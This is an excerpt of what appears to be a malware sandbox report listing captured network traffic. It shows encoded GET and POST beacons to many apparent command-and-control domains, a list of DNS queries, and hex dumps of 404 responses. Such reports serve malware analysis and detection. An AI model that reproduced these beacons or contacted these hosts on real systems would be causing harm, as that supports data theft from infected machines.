            Source: global trafficHTTP traffic detected: GET /kc69/?KxdLgNi=NmpF3EhDDWuD2jt+k/g095xLRHRyuzqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGNcTC3e2/WFeQ1r1lf08AeSNxqtZfuNHfso7Fe4LFqfY2Mw==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.asian-massage-us.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ifo8/?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ag+qKGzHHtle7TmqA+4Kpt5MpPo1VtzF+jhQD474obZk+SA==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.aflaksokna.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p6o9/?KxdLgNi=Zmr/YL1wBhH5EvOXWek0Ss4N+9SYg/Tcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/zhQPgbZq8SnGCnwklmLK8GK6RzRHGkXrXeG9xuoq/9Gyzw==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.qiluqiyuan.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /45sz/?lL2=1ZRtX&KxdLgNi=wkQ2jmS8yMxgRlKUPxXZOSJfy276TIgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x/tSYSMAamA14mf1kJ7jyRRC6WiyMsI3Xnv4BkXKynB7mMQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.omexai.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr+x7luQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY4bjGHbWiFISykJbmA24D38d4U9gmj0KuNkWrH/Oj7BpqHw==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.dfbio.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /cent/?KxdLgNi=l1qN2MMhbl/x2ijEy8ZaF/5dmnCULpNS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vt2dguJryr4Bj4IAYy1znQiWrTpPSXnN2bxPBAKdOlTmcCg==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.healthsolutions.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gxi9/?lL2=1ZRtX&KxdLgNi=Ur1yZ7cx/WDhKbJVMH1InawKNi3bU8kDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGka4if3ZKlzYFZx3st7o0oN1uEWmnrbWQQ6vJ4evJTffgTg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.golbasi-nakliyat.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.clientebradesco.online
            Source: global trafficDNS traffic detected: DNS query: www.myim.cloud
            Source: global trafficDNS traffic detected: DNS query: www.d55dg.top
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.fineg.online
            Source: global trafficDNS traffic detected: DNS query: www.asian-massage-us.xyz
            Source: global trafficDNS traffic detected: DNS query: www.thriveline.online
            Source: global trafficDNS traffic detected: DNS query: www.aflaksokna.com
            Source: global trafficDNS traffic detected: DNS query: www.esistiliya.online
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.dfbio.net
            Source: global trafficDNS traffic detected: DNS query: www.healthsolutions.top
            Source: global trafficDNS traffic detected: DNS query: www.950021.com
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: unknownHTTP traffic detected: POST /12ts/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 208Host: www.myim.cloudOrigin: http://www.myim.cloudReferer: http://www.myim.cloud/12ts/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36Data Raw: 4b 78 64 4c 67 4e 69 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 7a 47 66 30 4f 33 54 79 6f 4c 68 79 63 2f 46 48 59 62 55 67 36 32 32 30 72 51 74 4c 58 35 5a 78 6d 35 67 4e 74 30 3d Data Ascii: KxdLgNi=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QzGf0O3TyoLhyc/FHYbUg6220rQtLX5Zxm5gNt0=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 07:17:48 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 07:17:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 07:17:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 30 Aug 2024 07:17:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 07:18:15 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 07:18:17 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 07:18:20 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 07:18:22 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
